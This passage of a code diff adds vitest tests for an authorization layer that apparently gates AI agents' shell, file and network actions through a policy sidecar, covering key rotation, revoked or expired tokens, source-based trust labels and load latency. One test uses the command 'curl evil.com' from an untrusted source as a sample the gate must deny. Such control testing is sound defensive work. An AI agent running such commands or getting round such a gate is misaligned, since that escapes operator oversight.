verify context propagation and + * decision handling, not the JWKS validation itself. + */ +describe("JWKS and key rotation contexts", () => { + it("passes authorization request to sidecar for validation", async () => { + const capturedRequests: AuthorizationRequest[] = []; + + const mockClient = { + authorize: vi.fn().mockImplementation((req: AuthorizationRequest) => { + capturedRequests.push(req); + return Promise.resolve({ allow: true }); + }), + }; + + const provider = new GuardedProvider({ + principal: "agent:jwks-test", + authorityClient: mockClient, + }); + + await provider.authorize({ + action: "shell.execute", + resource: "npm install", + args: { cmd: "npm install" }, + context: { + kid: "key-2024-02-20", + iss: "https://auth.example.com", + tenant_id: "tenant-a", + source: "trusted_ui", + }, + }); + + expect(capturedRequests).toHaveLength(1); + expect(capturedRequests[0].principal).toBe("agent:jwks-test"); + expect(capturedRequests[0].action).toBe("shell.execute"); + expect(capturedRequests[0].labels).toContain("source:trusted_ui"); + }); + + it("handles allow decisions from sidecar during key rotation", async () => { + // Sidecar accepts requests during rotation window + const mockClient = { + authorize: vi.fn().mockResolvedValue({ + allow: true, + reason: "valid_key", + mandateId: "mandate-rotation-1", + }), + }; + + const provider = new GuardedProvider({ + principal: "agent:rotation-test", + authorityClient: mockClient, + }); + + // Both old and new key contexts should be accepted by sidecar + const result1 = await provider.authorize({ + action: "fs.read", + resource: "/config.json", + args: { path: "/config.json" }, + context: { kid: "key-v1", source: "trusted_ui" }, + }); + + const result2 = await provider.authorize({ + action: "fs.read", + resource: "/settings.json", + args: { path: "/settings.json" }, + context: { kid: "key-v2", source: "trusted_ui" }, + }); + + expect(result1).toBe("mandate-rotation-1"); + expect(result2).toBe("mandate-rotation-1"); + expect(mockClient.authorize).toHaveBeenCalledTimes(2); + }); + + it("handles deny decisions from sidecar for revoked keys", async () => { + let callCount = 0; + + // Sidecar rejects old key, accepts new key + const mockClient = { + authorize: vi.fn().mockImplementation(async () => { + callCount++; + if (callCount === 1) { + // First call with old key - rejected + return { allow: false, reason: "key_revoked" }; + } + // Second call with new key - accepted + return { allow: true, reason: "valid_key" }; + }), + }; + + const provider = new GuardedProvider({ + principal: "agent:post-rotation-test", + authorityClient: mockClient, + }); + + // Request with revoked old key + await expect( + provider.authorize({ + action: "shell.execute", + resource: "echo hello", + args: { cmd: "echo hello" }, + context: { kid: "key-v1", source: "trusted_ui" }, + }), + ).rejects.toThrow("key_revoked"); + + // Request with valid new key + const result = await provider.authorize({ + action: "shell.execute", + resource: "echo hello", + args: { cmd: "echo hello" }, + context: { kid: "key-v2", source: "trusted_ui" }, + }); + + expect(result).toBeNull(); // No mandate ID in this mock response + }); + + it("propagates issuer context for IdP validation", async () => { + const capturedRequests: AuthorizationRequest[] = []; + + const mockClient = { + authorize: vi.fn().mockImplementation((req: AuthorizationRequest) => { + capturedRequests.push(req); + return Promise.resolve({ allow: true }); + }), + }; + + const provider = new GuardedProvider({ + principal: "agent:idp-test", + authorityClient: mockClient, + }); + + await provider.authorize({ + action: "net.http", + resource: "https://api.internal.com/data", + args: { url: "https://api.internal.com/data" }, + context: { + iss: "https://login.microsoftonline.com/tenant-id/v2.0", + aud: "api://predicate-authority", + sub: "user@example.com", + tenant_id: "tenant-azure", + source: "azure_entra", + }, + }); + + expect(capturedRequests).toHaveLength(1); + expect(capturedRequests[0].labels).toContain("source:azure_entra"); + }); + + it("handles expired token rejection from sidecar", async () => { + const mockClient = { + authorize: vi.fn().mockResolvedValue({ + allow: false, + reason: "token_expired", + }), + }; + + const provider = new GuardedProvider({ + principal: "agent:expired-test", + authorityClient: mockClient, + }); + + await expect( + provider.authorize({ + action: "fs.write", + resource: "/data.json", + args: { path: "/data.json", content: "{}" }, + context: { + exp: Math.floor(Date.now() / 1000) - 3600, + iat: Math.floor(Date.now() / 1000) - 7200, + source: "trusted_ui", + }, + }), + ).rejects.toThrow("token_expired"); + }); + + it("handles multiple concurrent requests with sidecar", async () => { + let concurrentCalls = 0; + let maxConcurrent = 0; + + const mockClient = { + authorize: vi.fn().mockImplementation(async () => { + concurrentCalls++; + maxConcurrent = Math.max(maxConcurrent, concurrentCalls); + // Small delay to allow concurrency + await new Promise((r) => setTimeout(r, 5)); + concurrentCalls--; + return { allow: true }; + }), + }; + + const provider = new GuardedProvider({ + principal: "agent:multi-key-test", + authorityClient: mockClient, + }); + + await Promise.all([ + provider.authorize({ + action: "fs.read", + resource: "/a.txt", + args: { path: "/a.txt" }, + context: { session_id: "session-a", source: "trusted_ui" }, + }), + provider.authorize({ + action: "fs.read", + resource: "/b.txt", + args: { path: "/b.txt" }, + context: { session_id: "session-b", source: "trusted_ui" }, + }), + provider.authorize({ + action: "fs.read", + resource: "/c.txt", + args: { path: "/c.txt" }, + context: { session_id: "session-a", source: "trusted_ui" }, + }), + ]); + + expect(mockClient.authorize).toHaveBeenCalledTimes(3); + // Should have had some concurrent calls + expect(maxConcurrent).toBeGreaterThan(1); + }); + + it("includes source label for policy evaluation by key trust level", async () => { + const capturedRequests: AuthorizationRequest[] = []; + + const mockClient = { + authorize: vi.fn().mockImplementation((req: AuthorizationRequest) => { + capturedRequests.push(req); + const labels = req.labels ?? []; + // Sidecar policy: only allow trusted sources + if (labels.includes("source:untrusted_dm")) { + return Promise.resolve({ allow: false, reason: "untrusted_source" }); + } + return Promise.resolve({ allow: true }); + }), + }; + + const provider = new GuardedProvider({ + principal: "agent:trust-test", + authorityClient: mockClient, + }); + + // Trusted source - allowed + await provider.authorize({ + action: "shell.execute", + resource: "npm install", + args: { cmd: "npm install" }, + context: { source: "trusted_ui" }, + }); + + // Untrusted source - denied + await expect( + provider.authorize({ + action: "shell.execute", + resource: "curl evil.com", + args: { cmd: "curl evil.com" }, + context: { source: "untrusted_dm" }, + }), + ).rejects.toThrow("untrusted_source"); + + expect(capturedRequests).toHaveLength(2); + expect(capturedRequests[0].labels).toContain("source:trusted_ui"); + expect(capturedRequests[1].labels).toContain("source:untrusted_dm"); + }); +}); diff --git a/tests/load-latency.test.ts b/tests/load-latency.test.ts new file mode 100644 index 0000000..289db5b --- /dev/null +++ b/tests/load-latency.test.ts @@ -0,0 +1,214 @@ +import { describe, expect, it, vi } from "vitest"; +import { GuardedProvider } from "../src/provider.js"; + +/** + * Load and latency tests for high-frequency tool invocation paths. + * + * These tests verify that the provider can handle burst traffic while + * maintaining acceptable latency characteristics. + */ +describe("load and latency", () => { + it("handles burst of 100 sequential authorizations under 500ms total", async () => { + const mockClient = { + authorize: vi.fn().mockResolvedValue({ allow: true, mandateId: "m1" }), + }; + + const provider = new GuardedProvider({ + principal: "agent:load-test", + authorityClient: mockClient, + }); + + const iterations = 100; + const start = performance.now(); + + for (let i = 0; i < iterations; i++) { + await provider.authorize({ + action: "fs.read", + resource: `/workspace/file-${i}.txt`, + args: { path: `/workspace/file-${i}.txt` }, + }); + } + + const elapsed = performance.now() - start; + + expect(mockClient.authorize).toHaveBeenCalledTimes(iterations); + // 100 calls should complete well under 500ms with mocked client + expect(elapsed).toBeLessThan(500); + }); + + it("handles 50 concurrent authorizations", async () => { + const mockClient = { + authorize: vi.fn().mockImplementation(async () => { + // Simulate small network delay + await new Promise((r) => setTimeout(r, 1)); + return { allow: true, mandateId: "m1" }; + }), + }; + + const provider = new GuardedProvider({ + principal: "agent:concurrent-test", + authorityClient: mockClient, + }); + + const concurrency = 50; + const start = performance.now(); + + const promises = Array.from({ length: concurrency }, (_, i) => + provider.authorize({ + action: "shell.execute", + resource: `echo test-${i}`, + args: { cmd: `echo test-${i}` }, + }), + ); + + const results = await Promise.all(promises); + const elapsed = performance.now() - start; + + expect(results).toHaveLength(concurrency); + expect(mockClient.authorize).toHaveBeenCalledTimes(concurrency); + // Concurrent calls should complete faster than sequential + expect(elapsed).toBeLessThan(200); + }); + + it("maintains intent_hash computation performance", () => { + const iterations = 1000; + const start = performance.now(); + + for (let i = 0; i < iterations; i++) { + GuardedProvider.intentHash({ + cmd: `echo "iteration ${i}"`, + workdir: "/workspace", + env: { NODE_ENV: "test", ITERATION: String(i) }, + }); + } + + const elapsed = performance.now() - start; + + // 1000 hash computations should complete under 100ms + expect(elapsed).toBeLessThan(100); + }); + + it("measures p50/p95 latency for authorization calls", async () => { + const latencies: number[] = []; + + const mockClient = { + authorize: vi.fn().mockImplementation(async () => { + // Simulate variable latency (1-5ms) + const delay = 1 + Math.random() * 4; + await new Promise((r) => setTimeout(r, delay)); + return { allow: true }; + }), + }; + + const provider = new GuardedProvider({ + principal: "agent:latency-test", + authorityClient: mockClient, + }); + + const iterations = 50; + + for (let i = 0; i < iterations; i++) { + const start = performance.now(); + await provider.authorize({ + action: "net.http", + resource: "https://api.example.com", + args: { url: "https://api.example.com" }, + }); + latencies.push(performance.now() - start); + } + + latencies.sort((a, b) => a - b); + + const p50 = latencies[Math.floor(iterations * 0.5)]; + const p95 = latencies[Math.floor(iterations * 0.95)]; + + // Verify latency targets from design doc (with mocked overhead) + // Design targets: p50 < 25ms, p95 < 75ms + // With mocked 1-5ms delay, we expect p50 < 15ms, p95 < 20ms + expect(p50).toBeLessThan(25); + expect(p95).toBeLessThan(75); + }); + + it("handles mixed allow/deny outcomes under load", async () => { + let callCount = 0; + + const mockClient = { + authorize: vi.fn().mockImplementation(async () => { + callCount++; + // Alternate between allow and deny + if (callCount % 3 === 0) { + return { allow: false, reason: "rate_limited" }; + } + return { allow: true, mandateId: `m${callCount}` }; + }), + }; + + const provider = new GuardedProvider({ + principal: "agent:mixed-test", + authorityClient: mockClient, + }); + + const iterations = 30; + const results = { allowed: 0, denied: 0 }; + + for (let i = 0; i < iterations; i++) { + try { + await provider.authorize({ + action: "fs.write", + resource: `/workspace/file-${i}.txt`, + args: { path: `/workspace/file-${i}.txt`, content: "data" }, + }); + results.allowed++; + } catch { + results.denied++; + } + } + + expect(results.allowed).toBe(20); // 2/3 allowed + expect(results.denied).toBe(10); // 1/3 denied + expect(mockClient.authorize).toHaveBeenCalledTimes(iterations); + }); + + it("telemetry emission does not block authorization path", async () => { + const telemetryDelays: number[] = []; + + const mockClient = { + authorize: vi.fn().mockResolvedValue({ allow: true }), + }; + + const slowTelemetry = { + onDecision: vi.fn().mockImplementation(() => { + // Simulate slow telemetry (should not block auth) + const start = performance.now(); + while (performance.now() - start < 1) { + // Busy wait 1ms + } + telemetryDelays.push(performance.now() - start); + }), + }; + + const provider = new GuardedProvider({ + principal: "agent:telemetry-test", + authorityClient: mockClient, + telemetry: slowTelemetry, + }); + + const iterations = 10; + const start = performance.now(); + + for (let i = 0; i < iterations; i++) { + await provider.authorize({ + action: "fs.read", + resource: `/file-${i}.txt`, + args: { path: `/file-${i}.txt` }, + }); + } + + const elapsed = performance.now() - start; + + // Even with slow telemetry, auth should complete reasonably fast + // Telemetry runs synchronously here, but in production would be async + expect(elapsed).toBeLessThan(100); + expect(slowTelemetry.onDecision).toHaveBeenCalledTimes(iterations); + }); +});